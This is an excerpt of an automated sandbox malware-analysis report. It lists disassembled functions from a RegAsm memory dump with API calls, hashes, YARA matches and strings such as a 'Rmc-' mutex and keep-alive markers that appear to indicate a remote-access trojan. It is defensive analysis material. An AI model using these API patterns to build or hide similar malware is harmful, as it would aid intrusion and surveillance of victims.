1621->1582
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044AD23
                                          • __alloca_probe_16.LIBCMT ref: 0044AD5B
                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044ADA9
                                          • __alloca_probe_16.LIBCMT ref: 0044AE40
                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AEA3
                                          • __freea.LIBCMT ref: 0044AEB0
                                            • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                          • __freea.LIBCMT ref: 0044AEB9
                                          • __freea.LIBCMT ref: 0044AEDE
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                          • String ID:
                                          • API String ID: 3864826663-0
                                          • Opcode ID: 276b4224ba7534166915209a775ab474993eb6b0505c2e4c67818911aa509b1e
                                          • Instruction ID: de232b2c18f644b0009b05ef7aad101f1c584e700cc6948cb3d999d9ae9be8cc
                                          • Opcode Fuzzy Hash: 276b4224ba7534166915209a775ab474993eb6b0505c2e4c67818911aa509b1e
                                          • Instruction Fuzzy Hash: 41514C72A80206AFFB258F64CC41EBF77A9DB44750F25462EFC14D7240EB38DC60869A
                                          Function 0041B354 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                            • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                            • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                            • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32 ref: 00413622
                                            • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                          • StrToIntA.SHLWAPI(00000000), ref: 0041B3CD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$CloseCurrentOpenQueryValueWow64
                                          • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                          • API String ID: 782494840-2070987746
                                          • Opcode ID: a9c02e874ac761b1a54f69f9c7c0e468dff2f28919116cd580da9d812710a803
                                          • Instruction ID: f33cb4008a08c387480eb48f471200dcc92f04aa72c22424ac0a9b44a4c1d04d
                                          • Opcode Fuzzy Hash: a9c02e874ac761b1a54f69f9c7c0e468dff2f28919116cd580da9d812710a803
                                          • Instruction Fuzzy Hash: 8811C47064014926C704B7658C97EFE76198790344F94413BF806A61D3FB6C598683EE
                                          Function 10008821 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                          Download Yara Rule
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
                                          • __freea.LIBCMT ref: 10008A08
                                            • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                          • __freea.LIBCMT ref: 10008A11
                                          • __freea.LIBCMT ref: 10008A36
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide__freea$AllocateHeap
                                          • String ID:
                                          • API String ID: 1414292761-0
                                          • Opcode ID: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                          • Instruction ID: 3f57ce737592ef9202bcebfaa3f65c0582e3f3231b4dd00ae19a895c9b397c34
                                          • Opcode Fuzzy Hash: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                          • Instruction Fuzzy Hash: 4F51CF72710216ABFB15CF60CC85EAB37A9FB417D0F11462AFC44D6148EB35EE509BA1
                                          Function 00415B25 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CountEventTick
                                          • String ID: !D@$NG
                                          • API String ID: 180926312-2721294649
                                          • Opcode ID: e4d6f1142550c4a5ff115462e5a39bbe35dfcbd7a27ecb26af4874e68cbb448e
                                          • Instruction ID: 3ac9408315e1e6036cedb879f74fb80cbd33a95067926c5a5f9e9f7d680cff10
                                          • Opcode Fuzzy Hash: e4d6f1142550c4a5ff115462e5a39bbe35dfcbd7a27ecb26af4874e68cbb448e
                                          • Instruction Fuzzy Hash: 3E51A5315082019AC724FB32D852AFF73A5AF94304F50483FF54A671E2EF3C5945C68A
                                          Function 00404F51 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58timethreadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetLocalTime.KERNEL32(00000001,00474EE0,00475598,?,?,?,?,00415D11,?,00000001), ref: 00404F81
                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EE0,00475598,?,?,?,?,00415D11,?,00000001), ref: 00404FCD
                                          • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                                          Strings
                                          • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Create$EventLocalThreadTime
                                          • String ID: KeepAlive | Enabled | Timeout:
                                          • API String ID: 2532271599-1507639952
                                          • Opcode ID: 428bc55d4a31c43cbc360544c684b23c3ac7d4a2dd682b4fcf6922528a401838
                                          • Instruction ID: 41fa32a9fb91b1633a7afb8999ae97baef60c60c8d6252053b050d354fdafbcf
                                          • Opcode Fuzzy Hash: 428bc55d4a31c43cbc360544c684b23c3ac7d4a2dd682b4fcf6922528a401838
                                          • Instruction Fuzzy Hash: 82110A71800385BAC720A7779C0DEAB7FACDBD2714F04046FF54162291D6B89445CBBA
                                          Function 004137AA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                          • RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000), ref: 004137E1
                                          • RegCloseKey.KERNEL32(?), ref: 004137EC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseCreateValue
                                          • String ID: pth_unenc
                                          • API String ID: 1818849710-4028850238
                                          • Opcode ID: 3ae23bf51bdae044d43d0241d7839713fa8c787b67a3ee745682b35b7168c146
                                          • Instruction ID: b09b06e14e5a963f4ed757ac8f346f2723baee7be417271cc0de3610a50c6458
                                          • Opcode Fuzzy Hash: 3ae23bf51bdae044d43d0241d7839713fa8c787b67a3ee745682b35b7168c146
                                          • Instruction Fuzzy Hash: A4F06272500218FBDF00AFA1DC45DEA376CEF04751F108566FD1AA61A1DB359E14DB54
                                          Function 00404CC3 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                          • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00404DD2
                                          • CloseHandle.KERNEL32(00000000), ref: 00404DDB
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                          • String ID:
                                          • API String ID: 3360349984-0
                                          • Opcode ID: e2c7dcd9189a3044f1cf6e3ebfe82ec704a9a5fd688f20b61e04b54ec391fab7
                                          • Instruction ID: 30d48123e17294c38ae6f490953f1b42a5ca81467cb0df1087f173bd09261e59
                                          • Opcode Fuzzy Hash: e2c7dcd9189a3044f1cf6e3ebfe82ec704a9a5fd688f20b61e04b54ec391fab7
                                          • Instruction Fuzzy Hash: 684182B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                          Function 1000C7E6 Relevance: 6.1, APIs: 4, Instructions: 65COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                          • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                            • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                            • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: HandleModuleProtectVirtual
                                          • String ID:
                                          • API String ID: 2905821283-0
                                          • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                          • Instruction ID: 210348daefc771ff09e919cc38fdfa0d839c8297c2798a32150270056baeab90
                                          • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                          • Instruction Fuzzy Hash: 0301D22094574A38BA51D7B40C06EBA5FD8DB176E0B24D756F1408619BDDA08906C3AE
                                          Function 004485E6 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue), ref: 00448618
                                          • GetLastError.KERNEL32(?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367), ref: 00448624
                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000), ref: 00448632
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LibraryLoad$ErrorLast
                                          • String ID:
                                          • API String ID: 3177248105-0
                                          • Opcode ID: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                          • Instruction ID: 239c22332ac31c5199b3ba4764290be2907fca328f5d1df1ca03bb1201a614b6
                                          • Opcode Fuzzy Hash: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                          • Instruction Fuzzy Hash: D401FC32602322EBDB618A78EC4495F7758AF15BA2B22093AF909D3241DF24DC01C6EC
                                          Function 10005CE1 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
                                          • GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: LibraryLoad$ErrorLast
                                          • String ID:
                                          • API String ID: 3177248105-0
                                          • Opcode ID: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                          • Instruction ID: ab8c2af688280ff547417c348c7c3430721907d0b6a0cc88e9d35c15e8af339b
                                          • Opcode Fuzzy Hash: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                          • Instruction Fuzzy Hash: 59018436615732ABE7319B689C8CB4B7798EF056E2B214623F909D7158D731D801CAE0
                                          Function 0041C516 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0041C543
                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C568
                                          • CloseHandle.KERNEL32(00000000), ref: 0041C576
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$CloseCreateHandleReadSize
                                          • String ID:
                                          • API String ID: 3919263394-0
                                          • Opcode ID: eaf6ed3f63b4403b43378431095bcec12dbe7b76bb0b9555606dcebd0a0bb3a0
                                          • Instruction ID: 4673af35f3eeaf13de89ae80f5e83caf65f56e40ae5cb47f4621101913e6d1ef
                                          • Opcode Fuzzy Hash: eaf6ed3f63b4403b43378431095bcec12dbe7b76bb0b9555606dcebd0a0bb3a0
                                          • Instruction Fuzzy Hash: 50F0C2B1241318BFE6101B25ADC9EBB369DDB866A9F10063EF802A22D1DA698D055139
                                          Function 00418ACD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92COMMON
                                          Download Yara Rule
                                          APIs
                                          • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418AF9
                                            • Part of subcall function 00418691: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
                                          • SHCreateMemStream.SHLWAPI(00000000), ref: 00418B46
                                            • Part of subcall function 00418706: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
                                            • Part of subcall function 004186B4: GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                          • String ID: image/jpeg
                                          • API String ID: 1291196975-3785015651
                                          • Opcode ID: 4c0baae4c0e9e9d16754b7ecd539cceb7e47a4de3878ce98d6afbfe1b810872b
                                          • Instruction ID: 4d0b5c8bb5c89928ccad9adfa1773eea8e0f3015d74a4b244142dc53e7d0f70c
                                          • Opcode Fuzzy Hash: 4c0baae4c0e9e9d16754b7ecd539cceb7e47a4de3878ce98d6afbfe1b810872b
                                          • Instruction Fuzzy Hash: B5316D71604300AFC301EF65C884DAFBBE9EF8A304F00496EF985A7251DB7999048BA6
                                          Function 00418BCA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON
                                          Download Yara Rule
                                          APIs
                                          • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418BE5
                                            • Part of subcall function 00418691: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
                                          • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418C0A
                                            • Part of subcall function 00418706: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
                                            • Part of subcall function 004186B4: GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                          • String ID: image/png
                                          • API String ID: 1291196975-2966254431
                                          • Opcode ID: 7a889f2deb852e9dca1466351ef9d9e2129164c9164a110dc5b22d8ef1cd3f8f
                                          • Instruction ID: 3c300d9a249dbea914adbc87700f03e6b767f6cab6163cd9bde1f728fb98d86d
                                          • Opcode Fuzzy Hash: 7a889f2deb852e9dca1466351ef9d9e2129164c9164a110dc5b22d8ef1cd3f8f
                                          • Instruction Fuzzy Hash: ED219071204211AFC701AB61CC88CBFBBACEFCA754F10052EF54693261DB399955CBA6
                                          Function 0040D0A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC43,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0040D0B3
                                          • GetLastError.KERNEL32 ref: 0040D0BE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateErrorLastMutex
                                          • String ID: Rmc-OT0ZCG
                                          • API String ID: 1925916568-2453204340
                                          • Opcode ID: 28fa13b7b1caae5192b70daf2f30c6e0a610ddba166525727d25863cd50ab091
                                          • Instruction ID: 57749e379dff282fb0cfe370275dd79dddcb706c5168e3a31171962593876721
                                          • Opcode Fuzzy Hash: 28fa13b7b1caae5192b70daf2f30c6e0a610ddba166525727d25863cd50ab091
                                          • Instruction Fuzzy Hash: 0DD012B0605700EBDB186770ED5975839559744702F40487AB50FD99F1CBBC88908519
                                          Function 1000C7A7 Relevance: 4.6, APIs: 3, Instructions: 100COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                            • Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                            • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                            • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: HandleModuleProtectVirtual
                                          • String ID:
                                          • API String ID: 2905821283-0
                                          • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                          • Instruction ID: abaa11d5974e3e1b05dfd32ec0224f7ddc3d76465740e120717e363e7a178845
                                          • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                          • Instruction Fuzzy Hash: A921382140838A6FF711CBB44C05FA67FD8DB172E0F198696E040CB147DDA89845C3AE
                                          Function 00404AA1 Relevance: 4.6, APIs: 3, Instructions: 93synchronizationnetworkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                          • WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                          • SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: EventObjectSingleWaitsend
                                          • String ID:
                                          • API String ID: 3963590051-0
                                          • Opcode ID: b1d66744df5c6cb587348be29f4f2b73cfa97db57556f8ad38e66ecf600c3840
                                          • Instruction ID: ade4869c8039bafc3f5202e75afdfb18787be874a76dce876c460fae4797ad88
                                          • Opcode Fuzzy Hash: b1d66744df5c6cb587348be29f4f2b73cfa97db57556f8ad38e66ecf600c3840
                                          • Instruction Fuzzy Hash: 152124B2900119BBCB04ABA1DC95DEEB77CFF14314B00452FF515B71E2EB38AA15C6A4
                                          Function 1000C803 Relevance: 4.6, APIs: 3, Instructions: 54memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                          • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                          • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual$HandleModule
                                          • String ID:
                                          • API String ID: 3519776433-0
                                          • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                          • Instruction ID: 9138b94afbcae90e12a8614b592989542e7cb6e8cba5f1d72008c399686a5f74
                                          • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                          • Instruction Fuzzy Hash: B7F0C2619497893CFA21C7B40C45EBA5FCCCB276E0B249A56F600C718BDCA5890693FE
                                          Function 004135E1 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                          • RegQueryValueExA.KERNEL32 ref: 00413622
                                          • RegCloseKey.KERNEL32(?), ref: 0041362D
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseOpenQueryValue
                                          • String ID:
                                          • API String ID: 3677997916-0
                                          • Opcode ID: 6d7bb055a41a46af3afbf88891c67b332a8db22587d044117d184b09d82707ea
                                          • Instruction ID: 0661f39b514c0023b6096d8878825bbc81d19e8e8981dfb5b132c5fecbfe39b6
